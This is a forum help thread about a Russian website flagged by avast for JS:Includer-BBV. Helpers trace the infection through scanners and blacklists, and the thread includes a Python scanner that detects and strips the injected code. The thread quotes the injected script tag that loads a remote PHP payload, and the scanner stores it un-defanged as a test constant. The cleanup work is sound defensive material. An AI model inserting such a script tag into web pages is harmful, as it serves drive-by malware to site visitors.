Need help: JS:Includer-BBV [Trj]

http://diveistochnik.ru

avast reports:

URL: hxxp://www.diveistochnik.ru/|{gzip}
Infection: JS:Includer-BBV [Trj]

Is it really infected? What can I do to make avast stop reporting this?

https://www.virustotal.com/en/url/21c14c9f78d26884c038e6c15f087fc994f04d7c0a09299d08093e7b39f61b84/analysis/1417795220/
http://zulu.zscaler.com/submission/show/eed116143a72268c96d3425c6a81474f-1417795190

https://forum.avast.com/index.php?topic=53253.0

What can I do to make avast stop reporting this?
Don't try to visit it.

IP history - many domains on same IP and many are blacklisted https://www.virustotal.com/nb/ip-address/90.156.201.12/information/

114 websites hosted on that IP http://www.urlvoid.com/ip/90.156.201.12

I am owner of this site, now it is at 90.156.201.42

http://www.ipvoid.com/scan/90.156.201.42/

It isn't any better there.

I removed malicious link inside the file: http://diveistochnik.ru/O_CLUBE/index1.htm

reported by http://zulu.zscaler.com

is it not enough?

Thank you, I will write to hosting support.

Your previous score was 52/100 (Suspicious) and remains pretty much unchanged.

http://zulu.zscaler.com/submission/show/eed116143a72268c96d3425c6a81474f-1417798051

After the index1.html file, you still have a CSS file and 2 HTM files.

If you hang for a bit, I shall ask Polonus to help you track the issue(s)

Yes, of course.

46 websites on that IP http://www.urlvoid.com/ip/90.156.201.42 and many blacklisted

IP history https://www.virustotal.com/nb/ip-address/90.156.201.42/information/

maybe the IP is not static, it is shared by many sites. now it is at 90.156.201.32

http://www.urlvoid.com/ip/90.156.201.32
https://www.virustotal.com/nb/ip-address/90.156.201.32/information/

IPs don't change that fast!!

I checked it on VirusTracker and up came: diveistochnik dot ru,90.156.201.32,ns1.masterhost dot ru,Multiple IPs,
See: http://www.worldguide.pt/clean-mx/viruses.php?domain=adversa.ru&response=
Persistent overdue malware used in PHISH-ing: http://support.clean-mx.de/clean-mx/phishing.php?netname=MASTERHOST-HOSTING&sort=id%20DESC%20&response=alive
See: https://www.virustotal.com/nl/url/21c14c9f78d26884c038e6c15f087fc994f04d7c0a09299d08093e7b39f61b84/analysis/
Also consider on IP: https://www.mywot.com/en/scorecard/90.156.201.12?utm_source=addon&utm_content=popup
Virus mails, spam mails and phishing mails: http://www.robtex.net/en/advisory/ip/90/156/201/12/
All the info we need here we find via the Quttera scan of that website:
Malicious code found →

[[<!--f24624--><script type="text/javascript" src="htxp://aleksandr-motovilov.ru/qmxbjd7n.php?id=3692514"></script><!--/f24624-->]]

48 instances of this, see: http://quttera.com/detailed_report/diveistochnik.ru
blacklisted external links: diveistochnik dot ru/javascript:window[
diveistochnik dot ru/about:blank
Yandex blacklisted:

Yandex periodically checks websites to warn users about harmful webpages. The last check (less than two days ago) showed that this site contains malware. This can happen either in accordance with the owner’s intent or due to the tampering of fraudsters.

Malware:

includes websites blacklisted by Yandex for distributing malware,
contains exploit (according to the Yandex behavior analyzer);
contains Troj/JSRedir-NZ (data provided by Sophos).
How Yandex verifies sites

Examples for Troj/JSRedir-NZ listed here: http://support.clean-mx.de/clean-mx/viruses.php?virusname=Troj/JSRedir-NZ&sort=id%20DESC

polonus
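The Quttera finding quoted above is one marker-wrapped external script tag repeated 48 times, and the site owner only cleaned a single file by hand. The scanner below is an added example (not code from this thread, from avast or from Quttera) that walks a site tree, finds every occurrence of the `<!--fNNNN--> <script src=...> <!--/fNNNN-->` pattern, strips it with a backup copy, and additionally lists every external `<script src>` host that is not on an allowlist of the site's own hostnames, since a re-check after removal should show no foreign script hosts left. The sample files, the allowlist and the directory names are constructed for the demo; only the injected tag itself is the one quoted in the thread.

```python
"""Added example: find and strip the marker-wrapped injected <script> tag
quoted in this thread across a whole site tree, then re-check for any
remaining external script hosts. Sample site below is constructed."""
import os
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Marker pattern from the Quttera report quoted in the thread:
#   <!--fNNNN--> <script ... src="..."></script> <!--/fNNNN-->
INJECT_RE = re.compile(
    r"<!--(?P<tag>f\d+)-->\s*"
    r"<script\b[^>]*\bsrc=[\"'](?P<src>[^\"']+)[\"'][^>]*>\s*</script>\s*"
    r"<!--/(?P=tag)-->",
    re.IGNORECASE,
)
# General check (goes beyond the single pattern): any <script src=...> at all.
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc=[\"']([^\"']+)[\"']", re.IGNORECASE)
# The thread notes the CSS file and further HTM files still flag, so scan these too.
TEXT_EXTS = {".htm", ".html", ".php", ".js", ".css"}

# The injected tag exactly as quoted in the thread (scheme un-defanged for parsing).
INJECTED = ('<!--f24624--><script type="text/javascript" '
            'src="http://aleksandr-motovilov.ru/qmxbjd7n.php?id=3692514"></script><!--/f24624-->')


def injected_markers(text):
    """Return (marker, src URL) for every marker-wrapped injected script in text."""
    return [(m.group("tag"), m.group("src")) for m in INJECT_RE.finditer(text)]


def foreign_script_hosts(text, own_hosts):
    """Return hosts of <script src> URLs not in own_hosts (an assumed allowlist)."""
    hosts = set()
    for src in SCRIPT_SRC_RE.findall(text):
        host = urlparse(src).netloc.lower()
        if host and host not in own_hosts:
            hosts.add(host)
    return sorted(hosts)


def scan_tree(root, own_hosts):
    """Walk the site; report per file the injected markers and foreign script hosts."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix.lower() not in TEXT_EXTS:
                continue
            text = p.read_text(encoding="utf-8", errors="replace")
            markers = injected_markers(text)
            foreign = foreign_script_hosts(text, own_hosts)
            if markers or foreign:
                report[p.relative_to(root).as_posix()] = {"markers": markers, "foreign": foreign}
    return report


def strip_injection(path):
    """Remove marker-wrapped injections in place, keeping a .bak copy. Returns count removed."""
    p = Path(path)
    text = p.read_text(encoding="utf-8", errors="replace")
    cleaned, n = INJECT_RE.subn("", text)
    if n:
        p.with_name(p.name + ".bak").write_text(text, encoding="utf-8")
        p.write_text(cleaned, encoding="utf-8")
    return n


def build_sample_site():
    """Constructed sample tree loosely mirroring the thread's findings (not the real site)."""
    root = Path(tempfile.mkdtemp())
    (root / "O_CLUBE").mkdir()
    (root / "index.htm").write_text("<html><body>hello" + INJECTED + "</body></html>", encoding="utf-8")
    (root / "O_CLUBE" / "index1.htm").write_text("<html><body>cleaned by owner</body></html>", encoding="utf-8")
    (root / "O_CLUBE" / "page2.htm").write_text("<div>x</div>" + INJECTED + "<div>y</div>" + INJECTED, encoding="utf-8")
    (root / "style.css").write_text("body{margin:0}", encoding="utf-8")
    # A third-party hit counter (not the injection) still shows up as a foreign host to review.
    (root / "stats.htm").write_text('<script src="http://hit8.hotlog.ru/cgi-bin/hotlog/count"></script>', encoding="utf-8")
    return root


def demo():
    """Scan, strip, re-scan. Returns (report before, removed counts, report after)."""
    own = {"diveistochnik.ru", "www.diveistochnik.ru"}  # assumed allowlist
    root = build_sample_site()
    before = scan_tree(root, own)
    removed = {f: strip_injection(root / f) for f in before}
    after = scan_tree(root, own)
    return before, removed, after


if __name__ == "__main__":
    b, r, a = demo()
    print("before:", b)
    print("removed:", r)
    print("after:", a)
```

The re-scan after stripping is the important part: a file is only clean when it reports neither the marker nor an unexpected external script host, and anything that remains (here the hotlog counter) is something to review deliberately rather than assume. A scanner like this only removes the payload, not the way it was planted; the hosting account, FTP credentials and any writable upload path still need to be checked or the tag will come back.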

Hi Michael,

Site has hotlog and that is why it could have been compromised like with this: http://forums.cpanel.net/f5/warning-downloadable-shell-exploit-52043-print.html
See: htxp://diveistochnik.ru/O_CLUBE/index1.htm
As this is fortunately blocked by an extension in my browser: htxp://hit8.hotlog.ru/cgi-bin/hotlog/count

polonus

P.S. For the IPs, verify this in the domain hosting history; Peter Kleissner's scan gave me "multiple IP domain" as a result.
So we check here: http://toolbar.netcraft.com/site_report?url=http://diveistochnik.ru&refresh=1#history_table
See hosting history:

Netblock owner                                                  IP address      OS       Web server  Last seen
Masterhost.ru is a hosting and technical support organization.  90.156.201.42   FreeBSD  Apache      5-Dec-2014
Masterhost.ru is a hosting and technical support organization.  90.156.201.32   unknown  Apache      23-Jul-2011
Re: http://whois.domaintools.com/diveistochnik.ru

Damian

And he's here! I would take his advice for what it is. He's quite smart :-). He's been doing this for a few years :-)

Thank you Polonus!

Hi Michael,

You are welcome. Like to thank you also for the inspiration, we as users here inspire each other and we grow abilities in doing this together.
As Yandex produces Troj/JSRedir-NZ via SOPHOS and that equals avast’s JS:Includer-BBV [Trj] detection, we already have solved the greater part of this riddle.
Furthermore as we can establish that the code for this detection is still there and we can point to that we know enough.

Then analyzing what is on that site at http://fetch.scritch.org/ made me stumble on the term hotlog going over some script found there and then the online link with the possible exploit method was an additional bonus when going all through this.

That is more or less my line of reasoning here, helped by my dissecting experience from years and years. Just explain all this so you can track this back for educational purposes.

polonus